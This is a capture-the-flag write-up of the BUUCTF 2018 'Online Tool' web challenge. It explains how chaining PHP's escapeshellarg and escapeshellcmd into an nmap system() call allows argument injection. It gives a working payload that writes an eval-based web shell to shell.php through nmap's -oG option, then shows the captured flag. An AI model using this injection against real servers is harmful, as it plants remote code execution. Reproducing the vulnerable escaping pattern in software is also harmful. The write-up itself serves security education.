BUUCTF WEB [BUUCTF 2018]Online Tool

• Enter the environment , Get a piece of code

  <?php
  
  if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        
      $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
  }
  
  if(!isset($_GET['host'])) {
        
      highlight_file(__FILE__);
  } else {
        
      $host = $_GET['host'];
      $host = escapeshellarg($host);
      $host = escapeshellcmd($host);
      $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
      echo 'you are in sandbox '.$sandbox;
      @mkdir($sandbox);
      chdir($sandbox);
      echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
  

  among ,

  escapeshellarg() The function is used to transcode a string to shell The parameters used in the command , That is to escape special symbols such as single quotation marks , And wrap the escaped single quotation marks with two other single quotation marks

  <?php
  echo escapeshellarg("123"); // '123'
  echo escapeshellarg("12' 3");// '12'\'' 3'
  ?>
  

  escapeshellcmd() Function for shell Metacharacter escape , It's in special characters and No paired single quotes Insert before \

  <?php
  echo escapeshellcmd("123"); // 123
  echo escapeshellcmd("12' 3");// 12\' 3
  echo escapeshellcmd("12'' 3");// 12'' 3
  ?>
  

  Here you can refer to this article Talk about escapeshellarg The problem of parameter bypass and injection (lmxspace.com) Know how to solve this problem

• Because of the existence of two filters , We can only execute one order . stay nmap There are several parameters in the

  OUTPUT:
    -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
       and Grepable format, respectively, to the given filename.
  

  You can write commands and results to files

• Here we can use escapeshellarg And escapeshellcmd Used together to construct a command execution vulnerability

  ?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '
  

  Echo as

  you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
  

• Connect with an ant sword , Find... In the root directory of the file flag file

  flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}